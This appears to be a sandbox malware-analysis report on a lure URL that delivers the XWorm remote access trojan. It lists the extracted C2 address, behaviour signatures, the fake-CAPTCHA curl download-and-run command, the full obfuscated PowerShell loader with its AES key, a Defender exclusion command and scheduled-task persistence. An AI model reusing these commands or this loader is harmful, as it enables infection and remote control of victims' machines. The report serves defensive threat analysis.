Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

URLScan

urlscan

1

http://onlyfans.ong

windows10-2004-x64

10

http://onlyfans.ong

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    300s
  • max time network
    296s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01/03/2025, 22:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    http://onlyfans.ong

Score
10/10
xwormdiscoveryexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

45.154.98.138:5939

Mutex

iVJRN7HmpQeCP6EU

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 16 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://onlyfans.ong
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2760
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbb8fdcc40,0x7ffbb8fdcc4c,0x7ffbb8fdcc58
      2⤵
        PID:212
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1820 /prefetch:2
        2⤵
          PID:4072
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2196 /prefetch:3
          2⤵
            PID:3720
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2208 /prefetch:8
            2⤵
              PID:1016
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3036,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3068 /prefetch:1
              2⤵
                PID:3744
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3060,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3248 /prefetch:1
                2⤵
                  PID:3468
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3752,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4500 /prefetch:1
                  2⤵
                    PID:2476
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4724,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4720 /prefetch:8
                    2⤵
                      PID:3312
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4796,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4856 /prefetch:1
                      2⤵
                        PID:5904
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4880,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4812 /prefetch:1
                        2⤵
                          PID:5920
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5140,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5132 /prefetch:8
                          2⤵
                            PID:6008
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5268,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5284 /prefetch:8
                            2⤵
                              PID:6024
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5272,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5432 /prefetch:8
                              2⤵
                                PID:6064
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5148,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5572 /prefetch:8
                                2⤵
                                  PID:6112
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4800,i,8437134765815631119,4436302602222194791,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:8
                                  2⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:6044
                              • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                1⤵
                                  PID:2088
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                  1⤵
                                    PID:3936
                                  • C:\Windows\system32\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c curl.exe -k -Ss "https://onlyfans.ong/fodnvishvkshu/fedora.bat" -o "C:\Users\Admin\Zflare.bat" && start "" "C:\Users\Admin\Zflare.bat" By pressing OK you confirm you are not a robot.
                                    1⤵
                                      PID:5492
                                      • C:\Windows\system32\curl.exe
                                        curl.exe -k -Ss "https://onlyfans.ong/fodnvishvkshu/fedora.bat" -o "C:\Users\Admin\Zflare.bat"
                                        2⤵
                                          PID:5604
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Zflare.bat" By pressing OK you confirm you are not a robot.
                                          2⤵
                                            PID:4332
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\Zflare.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('By pressing OK you confirm you are not a robot.'));
                                              3⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Modifies registry class
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:1700
                                              • C:\Windows\system32\reagentc.exe
                                                "reagentc.exe" /disable
                                                4⤵
                                                • Drops file in System32 directory
                                                • Drops file in Windows directory
                                                PID:5740
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:5796
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Realtek-Audio' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Realtek-Hub\4m2svpmyq5d6.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                4⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:5864
                                              • C:\Windows\System32\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Realtek-Hub\4m2svpmyq5d6.vbs"
                                                4⤵
                                                • Checks computer location settings
                                                PID:6044
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Realtek-Hub\4m2svpmyq5d6.bat" "
                                                  5⤵
                                                    PID:5172
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\AppData\Local\Realtek-Hub\4m2svpmyq5d6.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                      6⤵
                                                      • Blocklisted process makes network request
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:3236
                                                      • C:\Windows\system32\reagentc.exe
                                                        "reagentc.exe" /disable
                                                        7⤵
                                                        • Drops file in Windows directory
                                                        PID:1004
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                        7⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:2476
                                          • C:\Windows\system32\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /c curl.exe -k -Ss "https://onlyfans.ong/fodnvishvkshu/fedora.bat" -o "C:\Users\Admin\Zflare.bat" && start "" "C:\Users\Admin\Zflare.bat" By pressing OK you confirm you are not a robot.
                                            1⤵
                                              PID:5520
                                              • C:\Windows\system32\curl.exe
                                                curl.exe -k -Ss "https://onlyfans.ong/fodnvishvkshu/fedora.bat" -o "C:\Users\Admin\Zflare.bat"
                                                2⤵
                                                  PID:5708
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Zflare.bat" By pressing OK you confirm you are not a robot.
                                                  2⤵
                                                    PID:5696
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\Zflare.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('By pressing OK you confirm you are not a robot.'));
                                                      3⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Modifies registry class
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:5884
                                                      • C:\Windows\system32\reagentc.exe
                                                        "reagentc.exe" /disable
                                                        4⤵
                                                        • Drops file in Windows directory
                                                        PID:5840
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:5180
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Realtek-Audio' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Realtek-Hub\qu5acezmwt110.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:6040
                                                      • C:\Windows\System32\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Realtek-Hub\qu5acezmwt110.vbs"
                                                        4⤵
                                                        • Checks computer location settings
                                                        PID:5400
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Realtek-Hub\qu5acezmwt110.bat" "
                                                          5⤵
                                                            PID:2728
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\AppData\Local\Realtek-Hub\qu5acezmwt110.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('AMclMxV1Dlk4dZ9xhbeJ8BRXNPk2xSdjNKmZKsaNmvY='); $aes_var.IV=[System.Convert]::FromBase64String('3BwBnL3TCjApahEOZRTO8g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                              6⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:5956
                                                              • C:\Windows\system32\reagentc.exe
                                                                "reagentc.exe" /disable
                                                                7⤵
                                                                • Drops file in Windows directory
                                                                PID:4696
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                                7⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:5472

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
                                                    Filesize

                                                    649B

                                                    MD5

                                                    5f0158eb12f95507eebea00118d868f9

                                                    SHA1

                                                    9cc1161e0b6f4dbdbb61a9ac82896297a525fd5b

                                                    SHA256

                                                    423c6a725b17f00eef684be4580d44534478c4584503310ee3811a3f23111553

                                                    SHA512

                                                    126eee85c8dba540861e604246fdeb3fc316eaca6e040a1bd1273f18fd8cb1f7cb24101b4905f491c4f84b84d47a41bf157d6e0dd9ac1f2d7fcbd7dd1b0da673

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
                                                    Filesize

                                                    3KB

                                                    MD5

                                                    2a3aca19a00ce3956ef9fee52a0249c5

                                                    SHA1

                                                    e74abed65f662daca2427d5b1854ed9c48eae2da

                                                    SHA256

                                                    a3ff93c645b2708ea707a900ef2ecc85858d1a961829660c8c70ce7479ab04f1

                                                    SHA512

                                                    b9b1fea15a74015785bd08692a45e96e29f3403c1f2d43b8b8bbef9cb64db91a7a3fa2fef8b8eb753fe4b77e8d37d05edb30d846e3d529bc817043e6cb267310

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                                    Filesize

                                                    2B

                                                    MD5

                                                    d751713988987e9331980363e24189ce

                                                    SHA1

                                                    97d170e1550eee4afc0af065b78cda302a97674c

                                                    SHA256

                                                    4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                    SHA512

                                                    b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
                                                    Filesize

                                                    356B

                                                    MD5

                                                    0dfe3c38e6da623abbe11d7056b09096

                                                    SHA1

                                                    06c11e4d806309d893dedd4171dd9368dcc41357

                                                    SHA256

                                                    0928203cc1581afd319a6d4bee7e306ea26d889bff2f5626d520cd3d751d320d

                                                    SHA512

                                                    20109e791ac18c5acd6c54108f8bc0178ffa17b4b456188a2eb594b7cc4117e3d0691fca9cd9db2679ceceb36682a17f505e15aa6ebd2217edad56e6de51e1aa

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                    Filesize

                                                    9KB

                                                    MD5

                                                    3d77d8880f548301237a03a61580fb98

                                                    SHA1

                                                    fc7a5fd2fbd9d55cc2890e028ebd078c16968b5c

                                                    SHA256

                                                    635f354871fbede3f4924d49b1f06e4d1baa9a5c268b1b2933dd1dbf44dbc041

                                                    SHA512

                                                    75293f90642e05a58420b3bf26b159e86f56cecf2230f4a0e50e9f49649daef68dd5ced4531e306a0f075f8c0ba84a21ac1d1697098bd3cfa510af1dc1ded689

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                    Filesize

                                                    9KB

                                                    MD5

                                                    39e61deb593088709f6e176c70627fb1

                                                    SHA1

                                                    aeb4e19afc75161f4b10fbb63d4fd8b8353a5a69

                                                    SHA256

                                                    6d26d8d262ff7470f6b1fdb454bc574b2b8be424f4607707cc3dddc7dbb8c4c9

                                                    SHA512

                                                    7932c0f439de71fedb28f19f4418ebe9b499a606f2f129003f1d3d04644563dd444444d04b81076daf824c68629a8603d9a06cee4d1d06c111c3a07d02282da5

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                    Filesize

                                                    9KB

                                                    MD5

                                                    6e5b1c401738e7e3a685279e1d9fce98

                                                    SHA1

                                                    4edd73d97b4c04aecf6b28985993e8d130cf863a

                                                    SHA256

                                                    3eef74e22642bbaabed574ba41c3d2f1689a6b3b3f387bbbab829694f06cd813

                                                    SHA512

                                                    a9b5cebf04f62b2cdcd880ff078f8dd9fcade81346aa9dbb2356b6cd8cc0fd2c80f83a3bc55be5c2fbf6ba17aa0da77005865d7f87a767768201e4a2b542253f

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                    Filesize

                                                    9KB

                                                    MD5

                                                    ab82643ac00dd8d5a285c804f3d1003b

                                                    SHA1

                                                    9bb61c030fccaf30e39dc06f1618a86825e1a520

                                                    SHA256

                                                    ace9dae07c6942a48cbbdeba39751e04cb041df97e02b0fd54f8a44e45249559

                                                    SHA512

                                                    c15a8978eead374629e2e81bfd83fd5c0a0954e7c483e7192907536641985b60646ee2e6c38e4b6a4b41def63940fc293a4c87f82b1934c301cd57552fd89982

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                    Filesize

                                                    9KB

                                                    MD5

                                                    d83ab63678e6cf08bbf5f02c709b57f1

                                                    SHA1

                                                    afde06889a6ced8f460f99a4ed077059495d0451

                                                    SHA256

                                                    6d35ef6d094860d13406ab0005d94bcfe0616c833d4304b5931190a0ae8eb2f5

                                                    SHA512

                                                    2a3977dc3bd1db7f8d708b5e2b9dfe49505b0c8468e5f8ec8c55e1b764897f2f8929f3741a50dbd2c80f4cf2aeedfba6d4da8be8c4822fcac795e818c6cfa5c6

                                                    Download Submit

                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                    Filesize

                                                    9KB

                                                    MD5

                                                    f95c177f4d5be3fe0d4955c45acda4fc

                                                    SHA1

                                                    55602d7fbc0507a8b085b85eecfb926040e805f6

                                                    SHA256

                                                    79d5a52af5dc1011b6719216290f7b131add943a81318b5a4ec7186c58322878

                                                    SHA512

                                                    e18c4400e5c4aa888180275c1da08ae57c488e2d78405cef160985e682bf49d8ab8413582bcfafd865fdd3ecf5a53e6159af7e076e5def7fe5645dfdbf8d2451

                                                    Download Submit

